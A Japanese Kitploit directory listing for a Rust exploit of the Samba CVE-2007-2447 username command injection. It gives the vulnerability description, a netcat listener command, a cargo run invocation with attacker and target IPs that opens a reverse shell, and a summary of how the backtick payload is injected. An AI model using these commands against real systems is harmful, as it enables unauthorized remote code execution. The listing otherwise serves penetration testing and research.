Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2007-2447 — Samba smbd 3.0.20-Debian を標的とする CVE-2007-2447 エクスプロイトのスタンドアロン Rust 実装。 | Kitploit
ツール/GitHubGitHub/nika0x38/cve-2007-2447
脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロールリモートアクセスツールペイロード開発
GitHubnika0x38/cve-2007-2447

CVE-2007-2447

Samba smbd 3.0.20-Debian を標的とする CVE-2007-2447 エクスプロイトのスタンドアロン Rust 実装。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2007-2447 Samba エクスプロイト

Rust Security

CVE-2007-2447 エクスプロイトのスタンドアロン Rust 実装で、Samba smbd 3.0.20-Debian を標的とします。

脆弱性の説明

CVE-2007-2447 は、Samba バージョン 3.0.0 から 3.0.25rc3 におけるコマンドインジェクションの脆弱性です。この脆弱性は SamrChangePassword() 関数に存在し、ユーザー入力を適切にサニタイズしないため、攻撃者は SMB 認証中にユーザー名フィールド内のシェルメタキャラクタを介して任意のコマンドを実行できます。

前提条件

  • システムに Rust がインストールされていること
  • 標的が脆弱な Samba バージョンを実行していること
  • 標的に netcat が利用可能であること(通常はデフォルトでインストールされています)

使用方法

root@kitploit:~
cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>

例

root@kitploit:~
# Set up a netcat listener
nc -lvnp 4444

# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100

オプション

  • --lhost: 攻撃マシンの IP アドレス
  • --lport: リバースシェル接続を受け取るポート
  • --target: 標的マシンの IP アドレス

動作の仕組み

  1. コード内で直接 netcat リバースシェルペイロードを生成します
  2. バッククォートを使用してペイロードを SMB ユーザー名フィールドに注入します
  3. ポート 445 に不正な SMB Session Setup リクエストを送信します
  4. Samba のユーザー名処理におけるコマンドインジェクションを悪用します
  5. 標的でリバースシェルペイロードを実行します

特徴

  • スタンドアロン: Metasploit のような外部依存関係は不要
  • ポータブル: Rust がインストールされた任意のシステムで動作
  • 高速: 外部プロセスの生成なし

免責事項

このツールは、教育および許可されたペネトレーションテストの目的のみに使用されます。責任を持って、所有しているシステム、または明示的な許可を得た

ツールをダウンロード